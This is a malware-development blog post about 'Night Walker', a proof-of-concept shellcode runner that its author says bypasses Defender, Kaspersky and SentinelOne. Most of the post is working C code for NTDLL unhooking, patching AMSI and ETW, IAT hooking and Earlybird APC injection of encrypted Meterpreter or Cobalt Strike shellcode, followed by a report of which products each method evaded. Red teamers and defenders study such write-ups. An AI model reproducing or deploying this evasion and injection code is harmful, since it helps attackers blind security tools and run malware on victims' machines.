Offensive Tradecraft - Night Walker :: Thomas Marques

Introduction

In the beginning, all I wanted was to learn and implement a DLL unhooking technique called Perun’s Fart, originally created by SEKTOR7. Then I got ambitious and decided to add some basic evasion techniques I had learned, in order to build a complete POC ready to execute Meterpreter or Cobalt Strike shellcode.

Night Walker is a project that combines various AV/EDR bypass techniques: NTDLL unhooking, function call obfuscation, shellcode encryption, CreateThread and APC injection, IAT hooking, heap encryption, parent process ID spoofing, AMSI patching, and ETW patching.

I tested it against Kaspersky (premium), Defender, Defender ATP, SentinelOne, and I successfully bypassed them. I also tried to use NT APIs whenever possible.

In some cases, like SentinelOne, there were some alerts in the console.

If you would like to learn how to implement the custom GetModuleHandle and GetProcAddress I used in this POC, you can read my previous blog here or read this one from AliceCliment.

For my French friends: check out Processus’ blog about AV/EDR bypass. He has a good explanation in French of most of the techniques described here, and he also assisted me during the development of this project.

NTDLL Unhooking - PerunsFart

As mentioned before, I heard about this technique on the SEKTOR7 blog. I did some googling and found this awesome blog from dosxuz123. He even helped me when I ran into issues reproducing the technique with Nt APIs such as NtAllocateVirtualMemory instead of VirtualAlloc.

Instead of copying only the syscall stubs as he did, I copied the whole .text section. I got this idea from here. Here is the final overview of what I did.

void perunfart(HANDLE hSusProc) {
	LPVOID pRemoteCode = NULL;// where the fresh ntdll is going to be stored
	NTSTATUS success;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;// handle to current process
	DWORD oldPro = 0;
	DWORD dllSize1 = getSizeOfImage(dllModule);
	// we allocate buffer for our dll at pRemoteCode
	SIZE_T dllSize = getSizeOfImage(dllModule);
	success = pAllocMem(hCurProc, &pRemoteCode, 0, &dllSize, MEM_COMMIT, PAGE_READWRITE);
	if (success == 0x0)
		printf("[+]\tRW buffer created for dll: %p\n", pRemoteCode);
	// read ntdll from the suspended process and copy to local process
	PULONG bytesRead = NULL;
	success = pReadMem(hSusProc, (PVOID)dllModule, pRemoteCode, dllSize1, bytesRead);
	if (success == 0x0)
		printf("[+]\tNtdll copied from suspended to local process\n");
	//TerminateProcess(hSusProc, 0);
	// we replace the hooked .text section with the clean one
	if (unhook(dllModule, pRemoteCode, oldPro))
		printf("[+]\tUnhook sucessfull :)\n");
}

First, I created a suspended process using the CreateProcessA API.
Then, I retrieved the size of the NTDLL module and stored it in dllSize. After that, I allocated an empty buffer of that size at pRemoteCode in my local process. I continued by reading NTDLL from the suspended process and copying it into the previously allocated buffer, pRemoteCode. Now that we have the clean NTDLL in our local process, we just have to do some copy-paste. The unhook function is responsible for copying the clean .text section over the hooked one.

But in order to understand this, you need to know how to get to the .text section of a DLL module. Open PE-bear and load ntdll.dll. You will see that the section headers come right after the Optional Header of the NT headers structure.

We could manually parse the DOS header all the way down to the section headers, but winnt.h has a macro called IMAGE_FIRST_SECTION, which helps us access the first section header in the array of section headers of a PE file. Here’s the definition of this macro:

#define IMAGE_FIRST_SECTION( ntheader ) ((PIMAGE_SECTION_HEADER)        \
   ((ULONG_PTR)(ntheader) +                                            \
    FIELD_OFFSET( IMAGE_NT_HEADERS, OptionalHeader ) +                 \
    ((ntheader))->FileHeader.SizeOfOptionalHeader   \
   ))

It essentially adds the offset of the OptionalHeader field and the size of the optional header (FileHeader.SizeOfOptionalHeader) to the address of the IMAGE_NT_HEADERS structure, which yields the address of the first section header.
There’s another macro in winnt.h called IMAGE_SIZEOF_SECTION_HEADER. It represents the size of each section header in a PE file, which is useful since we are going to loop through the sections until we find the one we want. So, in order to get a pointer to the i-th section header, here’s what we are going to do:

IMAGE_SECTION_HEADER* cleanSectionHdr = (IMAGE_SECTION_HEADER*)((DWORD64)IMAGE_FIRST_SECTION(pNTHdr) + ((DWORD64)IMAGE_SIZEOF_SECTION_HEADER * i));
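
To see that pointer arithmetic in isolation, here is a minimal sketch in portable C. It does not include windows.h: the Demo* types and DEMO_SIZEOF_SECTION_HEADER are hypothetical stand-ins that only mirror the layout of the winnt.h definitions, and demo_section_header_offset is a helper name invented for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-ins for the winnt.h structures (assumption: only the
   fields needed for the arithmetic are kept, with their real sizes). */
typedef struct {
    uint16_t Machine;
    uint16_t NumberOfSections;
    uint32_t TimeDateStamp;
    uint32_t PointerToSymbolTable;
    uint32_t NumberOfSymbols;
    uint16_t SizeOfOptionalHeader;
    uint16_t Characteristics;
} DemoFileHeader;                 /* 20 bytes, like IMAGE_FILE_HEADER */

typedef struct {
    uint32_t       Signature;     /* "PE\0\0" */
    DemoFileHeader FileHeader;
    /* the optional header would start right here, at offset 24 */
} DemoNtHeadersPrefix;

#define DEMO_SIZEOF_SECTION_HEADER 40  /* same value as IMAGE_SIZEOF_SECTION_HEADER */

/* Offset of section header `index`, relative to the start of the NT headers. */
size_t demo_section_header_offset(const DemoNtHeadersPrefix *nt, unsigned index)
{
    assert(nt != NULL);
    assert(index < nt->FileHeader.NumberOfSections);
    return sizeof(DemoNtHeadersPrefix)            /* FIELD_OFFSET(..., OptionalHeader) */
         + nt->FileHeader.SizeOfOptionalHeader    /* skip the optional header */
         + (size_t)DEMO_SIZEOF_SECTION_HEADER * index;
}
```

With SizeOfOptionalHeader set to 240 (the size of a 64-bit optional header), the first section header sits 264 bytes past the start of the NT headers, and each following header is 40 bytes further.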

The final unhook function will look like this:

BOOL unhook(HMODULE hookedDLL, LPVOID cleanDLL, DWORD protection){
	char* pBaseAddr = (char*)cleanDLL;
	DWORD64 hDLL1 = (DWORD64)hookedDLL;
	NTSTATUS success;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;
	DWORD old = 0;
	// get pointers to main headers/structures
	IMAGE_DOS_HEADER* pDosHdr = (IMAGE_DOS_HEADER*)pBaseAddr;
	IMAGE_NT_HEADERS* pNTHdr = (IMAGE_NT_HEADERS*)((DWORD64)pBaseAddr + pDosHdr->e_lfanew);
	int i;
	for (i = 0; i < pNTHdr->FileHeader.NumberOfSections; i++) 
	{
		IMAGE_SECTION_HEADER* cleanSectionHdr = (IMAGE_SECTION_HEADER*)((DWORD64)IMAGE_FIRST_SECTION(pNTHdr) + ((DWORD64)IMAGE_SIZEOF_SECTION_HEADER * i));
		if (!strcmp((char*)cleanSectionHdr->Name, txt)) 
		{
			// we change the protection of hooked .text section
			SIZE_T sizeOfTxtSec = sizeof(cleanSectionHdr->Misc.VirtualSize);
			LPVOID hAddr = (LPVOID)(hDLL1 + cleanSectionHdr->VirtualAddress);
			success = pVirtualProtect(hCurProc, &hAddr, (PULONG)&sizeOfTxtSec, 0x80, &protection); //we make the remote buffer RWX
			if (NT_SUCCESS(success)) {
				printf("[+]\tProtection of hooked .text section changed to rwx\n");
			}
			// we copy cleanDLL to hookedDLL
			success = pWriteMem((HANDLE)0xffffffffffffffff, hAddr, (PVOID)((DWORD64)cleanDLL + cleanSectionHdr->VirtualAddress), sizeOfTxtSec, (SIZE_T*)NULL);
			printf("[+]\tLocation of hooked .text section: %p\n", hAddr);
			if (success == 0x0)
				printf("[+]\tClean .text section copied to hooked .text sucessfully\n");
			//we restore the protection
			success = pVirtualProtect((HANDLE)0xffffffffffffffff, &hAddr, (PULONG)&sizeOfTxtSec, protection, &protection);
			if (success == 0x0)
				printf("[+]\tProtection restored\n");
		}
	}
	if (success == 0x0)
		return true;
	return false;
}

First, I manually went from the DOS header to the NT headers. From there, I used the IMAGE_FIRST_SECTION and IMAGE_SIZEOF_SECTION_HEADER macros to loop through the section headers until I found the one named .text.
After I found it, I changed the protection of the hooked .text section to RWX. Then I copied the clean .text section over the hooked one, and finally I restored the protection. We now have an unhooked NTDLL.
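
One detail about the name lookup: the Name field of a section header is a fixed 8-byte array padded with null bytes, and a name that uses all 8 bytes has no terminator. The sketch below shows a bounded comparison that accounts for this. It is an illustration in portable C, not the code used in Night Walker; demo_section_name_is and DEMO_SHORT_NAME_LEN are hypothetical names.

```c
#include <assert.h>
#include <string.h>

#define DEMO_SHORT_NAME_LEN 8   /* same value as IMAGE_SIZEOF_SHORT_NAME */

/* Returns 1 when the 8-byte, null-padded section name equals `wanted`. */
int demo_section_name_is(const unsigned char name[DEMO_SHORT_NAME_LEN], const char *wanted)
{
    assert(name != NULL && wanted != NULL);
    size_t len = strlen(wanted);
    if (len > DEMO_SHORT_NAME_LEN)
        return 0;
    /* the leading bytes must match ... */
    if (memcmp(name, wanted, len) != 0)
        return 0;
    /* ... and everything after them must be null padding */
    for (size_t i = len; i < DEMO_SHORT_NAME_LEN; i++)
        if (name[i] != 0)
            return 0;
    return 1;
}
```

The padding check is what keeps ".text" from matching a longer name such as ".textbss", while never reading past the 8 bytes of the field.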

AMSI Patching

It’s a good idea to patch AMSI within our executable if we plan to use PowerShell post-exploitation scripts. We are going to apply a single-byte patch to the AmsiScanBuffer function inside amsi.dll. By doing so, each time AMSI scans a PowerShell script, AmsiScanBuffer will always return false. The original code is from MrUn1k0d3r; I only modified it to use NT APIs and a custom GetProcAddress.

void amsiPatch() {
	/* https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch/blob/main/patch-amsi-x64.c */
	NTSTATUS success;
	DWORD oldPro = 0;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;
	DWORD offset = 0x83;
	unsigned char patch[] = { '\x74' };
	SIZE_T sizeOfPatch = sizeof(patch);
	LPVOID ptrAm51Buff3r = hlpGetProcAddress(am51dll, am51Buff);
	printf("[+]\tLocation of AmsiScanBuffer: 0x%p\n", ptrAm51Buff3r);
	char* value = (char*)ptrAm51Buff3r;
	success = pVirtualProtect(hCurProc, &ptrAm51Buff3r, (PULONG)&sizeOfPatch, PAGE_EXECUTE_WRITECOPY, &oldPro);
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of AmsiScanBuffer changed to wcx\n");
	}
	printf("[+]\tAmsiScanBuffer before patching: %x\n", *(value + offset));
	success = pWriteMem(hCurProc, value + offset, (PVOID)patch, 1, (SIZE_T*)NULL);
	if (NT_SUCCESS(success)) {
		printf("[+]\tPatch applied successfully\n");
		printf("[+]\tAmsiScanBuffer  after patching: %x\n", *(value + offset));
	}
	success = pVirtualProtect(hCurProc, &ptrAm51Buff3r, (PULONG)&sizeOfPatch, oldPro, &oldPro);
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of AmsiScanBuffer restored\n");
		printf("[+]\tPatching successfull\n");
	}
}

ETW Patching - NtTraceEvent

Patching ETW events won’t do anything against kernel callbacks and mini filters, or anything working from the kernel.

Our goal here is to limit the events our process sends to ETW (Event Tracing for Windows).
Instead of patching EtwEventWrite, we are going to patch NtTraceEvent directly, which is the last function called from userland when an event is written.
The patch is simply a ret (return) instruction, 0xc3, so the function returns as soon as it is called. Again, the original code is from MrUn1k0d3r.

void etwPatch() {
	/* https://whiteknightlabs.com/2021/12/11/bypassing-etw-for-fun-and-profit/ */
	/* https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch/blob/main/patch-etw-x64.c */
	DWORD oldPro = 0;
	HANDLE hCurProc = (HANDLE)0xffffffffffffffff;
	NTSTATUS success;
	unsigned char patch[] = { '\xc3'};
	SIZE_T sizeOfPatch = sizeof(patch);
	LPVOID ptrNtTraceEvent = hlpGetProcAddress(dllModule, ntTraceEvent);
	printf("[+]\tLocation of NtTraceEvent: %p\n", ptrNtTraceEvent);
	char* value = (char*)ptrNtTraceEvent;
	printf("[+]\tNtTraceEvent 3rd byte before patching: %04x\n", *(value+3));
	success = pVirtualProtect(hCurProc, &ptrNtTraceEvent, (PULONG)&sizeOfPatch, PAGE_EXECUTE_WRITECOPY, &oldPro); 
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of NtTraceEvent changed to wcx\n");
	}
	success = pWriteMem(hCurProc, value+3, (PVOID)patch, 1, (SIZE_T*)NULL);
	if (NT_SUCCESS(success)) {
		printf("[+]\tRET instruction copied successfully\n");
		printf("[+]\tNtTraceEvent 3rd byte after patching: %x\n", *(value + 3));
	}
	success = pVirtualProtect(hCurProc, &ptrNtTraceEvent, (PULONG)&sizeOfPatch, oldPro, &oldPro);
	if (NT_SUCCESS(success)) {
		printf("[+]\tProtection of NtTraceEvent restored\n");
		printf("[+]\tPatching successfull\n");
	}
}

IAT Hooking

Within a PE file, there’s an array of data structures, one per imported DLL. Each of these structures gives the name of the imported DLL and points to an array of function pointers. This array of function pointers is known as the import address table (IAT). Each imported API has its own reserved spot in the IAT, where the Windows loader writes the address of the imported function.
IAT hooking is a technique used to replace the function pointers stored in the IAT with the address of another function we want to execute. When the IAT is hooked, the flow goes as follows:

1. The program calls CreateRemoteThread.
2. The program looks up the CreateRemoteThread address in the IAT.
3. Because the IAT has been tampered with, the CreateRemoteThread address in the IAT points to a rogue HookedCreateRemThr function.
4. The program jumps to the HookedCreateRemThr address retrieved in step 3.
5. HookedCreateRemThr intercepts the CreateRemoteThread parameters and executes some malicious code.
6. HookedCreateRemThr calls the legitimate kernel32!CreateRemoteThread routine. (I cheated and ended up calling NtCreateThreadEx instead :)
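
The call flow above can be mimicked with a plain table of function pointers, without touching a real PE file. This is a minimal sketch in portable C: demo_table plays the role of the IAT slot, demo_original the imported API, and demo_hook the rogue function. All of these names are hypothetical and exist only for this illustration.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*demo_fn)(int);

/* Stand-in for the real API (plays the role of CreateRemoteThread). */
int demo_original(int x) { return x + 1; }

static demo_fn demo_saved_original = NULL;  /* lets the hook forward the call */
static int demo_hook_calls = 0;             /* how many calls were intercepted */

/* Stand-in for HookedCreateRemThr: observes the call, then forwards it. */
int demo_hook(int x)
{
    demo_hook_calls++;
    assert(demo_saved_original != NULL);
    return demo_saved_original(x);
}

/* Stand-in for the IAT: the program always calls through this slot. */
demo_fn demo_table[1] = { demo_original };

/* Swap the slot's pointer for `hook`, remembering the previous target. */
void demo_install_hook(demo_fn hook)
{
    demo_saved_original = demo_table[0];
    demo_table[0] = hook;
}

int demo_hook_count(void) { return demo_hook_calls; }
```

The caller's code never changes: it keeps calling demo_table[0](...), and only the pointer stored in the slot decides which function actually runs.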

In order to successfully apply our hook inside the IAT, we first need to know how to access the Import Address Table with C/C++.
Open PE-bear again, but this time load calc.exe. Hover your mouse over Imports and you’ll see that it says Data Directory[1]: Imports. This just means that the imports come from the Data Directory array at index 1. The Data Directory is an array of data structures located in the PE file’s Optional Header.

There is a WinAPI function called ImageDirectoryEntryToDataEx that helps us retrieve the address of a directory entry. We just have to pass the base address of our current program and the index of the directory entry we wish to retrieve, which in our case is 1 (IMAGE_DIRECTORY_ENTRY_IMPORT), the import directory.

// get a HANDLE to the main module == BaseImage
HANDLE baseAddress = GetModuleHandle(NULL);
// get Import Table of main module
PIMAGE_IMPORT_DESCRIPTOR importTbl = (PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToDataEx(
	baseAddress,
	TRUE,
	IMAGE_DIRECTORY_ENTRY_IMPORT,
	&size,
	NULL);

Once we are in the import table, a nice trick from SEKTOR7 is to use the original function address as a reference to search directly inside the IAT.

PIMAGE_THUNK_DATA represents a pointer to an entry in the First Thunk. The definition of PIMAGE_THUNK_DATA in winnt.h is as follows:

typedef struct _IMAGE_THUNK_DATA64 {
    union {
        ULONGLONG ForwarderString;  // PBYTE 
        ULONGLONG Function;         // PDWORD
        ULONGLONG Ordinal;
        ULONGLONG AddressOfData;    // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA64;
typedef IMAGE_THUNK_DATA64 * PIMAGE_THUNK_DATA64;

The u1 union is used to represent the different types of data that can be stored in the First Thunk. Since we are using the original function address as a reference, we are interested in u1.Function, because it holds the memory address of the function we are looking for. Here is the final code:

BOOL Hookem(char* dll, char* origFunc, PROC hookingFunc) {
	ULONG size;
	DWORD i;
	BOOL found = FALSE;
	// get a HANDLE to a main module == BaseImage
	HANDLE baseAddress = GetModuleHandle(NULL);
	// get Import Table of main module
	PIMAGE_IMPORT_DESCRIPTOR importTbl = (PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToDataEx(
		baseAddress,
		TRUE,
		IMAGE_DIRECTORY_ENTRY_IMPORT,
		&size,
		NULL);
	// find imports for target dll 
	for (i = 0; i < size; i++) {
		char* importName = (char*)((PBYTE)baseAddress + importTbl[i].Name);
		if (_stricmp(importName, dll) == 0) {
			found = TRUE;
			break;
		}
	}
	if (!found)
		return FALSE;
	// Optimization: get original address of function to hook 
	// and use it as a reference when searching through IAT directly
	PROC origFuncAddr = (PROC)GetProcAddress(hlpGetModuleHandle(k3rn3l), origFunc);
	// Search IAT
	PIMAGE_THUNK_DATA thunk = (PIMAGE_THUNK_DATA)((PBYTE)baseAddress + importTbl[i].FirstThunk);
	while (thunk->u1.Function) {
		PROC* currentFuncAddr = (PROC*)&thunk->u1.Function;
		// found
		if (*currentFuncAddr == origFuncAddr) {
			// make sure memory is writable
			DWORD oldProtect = 0;
			VirtualProtect((LPVOID)currentFuncAddr, 4096, PAGE_READWRITE, &oldProtect);
			// set the hook
			*currentFuncAddr = (PROC)hookingFunc;
			// revert protection setting back
			VirtualProtect((LPVOID)currentFuncAddr, 4096, oldProtect, &oldProtect);
			printf("[+]\tIAT function %s() hooked!\n", origFunc);
			return TRUE;
		}
		thunk++;
	}
	return FALSE;
}
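
The search loop at the heart of Hookem can be tried out on synthetic data. The sketch below, in portable C, walks a zero-terminated array of 64-bit slots and returns the one that holds a reference address. DemoThunk64 is a simplified stand-in for IMAGE_THUNK_DATA64 and demo_find_thunk is a hypothetical helper; neither comes from the project.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for IMAGE_THUNK_DATA64: a single 64-bit slot. */
typedef struct {
    uint64_t Function;
} DemoThunk64;

/* Returns the slot whose value equals `target`, or NULL when the
   zero-terminated array does not contain it. */
DemoThunk64 *demo_find_thunk(DemoThunk64 *thunks, uint64_t target)
{
    assert(thunks != NULL);
    for (DemoThunk64 *t = thunks; t->Function != 0; t++) {
        if (t->Function == target)
            return t;
    }
    return NULL;
}
```

Returning a pointer to the slot, rather than its index, mirrors what the hook needs: the location to overwrite once the matching entry is found.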

Earlybird Injection

OPSEC: In an environment with Microsoft Defender for Endpoint, my payload executed successfully, but there was a medium alert because I queued a user APC. This probably comes from a kernel notification raised when a program uses the QueueUserAPC function.

The main advantage of this technique is that our shellcode gets executed by the main thread of a suspended program, which means the EDR hasn’t had time to hook it yet. Here’s a high-level overview of the technique:

Create a program in a suspended state.
Allocate memory for our shellcode inside the suspended program.
Copy our shellcode to the buffer.
Queue a user APC pointing to our shellcode memory inside the suspended program.

void earlybird(PROCESS_INFORMATION pi) {
	DWORD old = 0;
	DWORD fail = (DWORD)-1;
	NTSTATUS success;
	LPVOID pRemoteCode = NULL;
	SIZE_T payload_len = sizeof(payload);
	SIZE_T payload_len2 = sizeof(payload);
	success = pAllocMem(pi.hProcess, &pRemoteCode, 0, &payload_len, MEM_COMMIT, PAGE_READWRITE); // we allocate buffer for our payload
	if (NT_SUCCESS(success)) {
		printf("[+]\tRW buffer created in suspended process: %p\n", pRemoteCode);
	}
	XOR((char*)payload, payload_len2, (char*)key, sizeof(key));
	success = pWriteMem(pi.hProcess, pRemoteCode, (PVOID)payload, payload_len, (SIZE_T*)NULL); //we copy our payload to the buffer
	if (NT_SUCCESS(success)) {
		printf("[+]\tPayload successfully copied to suspended process\n");
	}
	success = pVirtualProtect(pi.hProcess, &pRemoteCode, (PULONG)&payload_len, PAGE_EXECUTE_READ, &old); //we make the remote buffer RX
	if (NT_SUCCESS(success)) {
		printf("[+]\tRemote buffer marked as RX\n");
	}
	if (pQueueUserAPC((PAPCFUNC)pRemoteCode, pi.hThread, NULL) != 0)
		printf("[+]\tUser APC queued successfully\n");
	if (ResumeThread(pi.hThread) != fail)
		printf("[+]\tThread resumed :)\n");
}

Heap Encryption while sleeping

This is mainly for Cobalt Strike shellcode. The idea here is to encrypt the heap, which contains the CS configuration, while we are sleeping.
Please refer to the original blog, which explains everything in depth.

Results

Let’s see how this basic shellcode runner performed against AV and EDR.

Defender

Completely bypassed using Earlybird or a combination of CreateRemoteThread + IAT hooking.

Kaspersky (Premium)

Completely bypassed using a combination of CreateRemoteThread + IAT hooking. Earlybird didn’t work here.

Defender ATP

Completely bypassed using Earlybird.

Defender for Endpoint (MDE)

The shellcode is executed and keeps running, but there’s an alert regarding the use of the QueueUserAPC function.

SentinelOne

The program gets blocked if we try to patch ETW, but when we remove the ETW patching, it executes successfully.
The shellcode is executed and keeps running, but there’s the following alert:
[Screenshot: SentinelOne alert]

Conclusion

This is a shellcode runner I developed to learn more about the PerunsFart technique, but I ended up adding more functionality.
It enhanced my knowledge of the Windows API, malware development, debugging, and C pointers.

A natural evolution from here is to look at techniques such as indirect syscalls with dynamic syscall IDs and try to implement them. Retrieving the shellcode from a remote server instead of hardcoding it inside our program should also be fun to implement. Using SystemFunction033 for shellcode encryption and decryption is also better OPSEC. All of these already have public POCs out there, so do your research and have fun.

Mentions

People you need to follow who are doing an amazing job.

Processus - Also assisted me and helped with the testing and development in this project.
dosxuz123 - Helped me with some issues I had.
AliceCliment - Check her amazing latest blog here.
TheD1rkMtr - He’s constantly releasing really cool projects about malware dev.
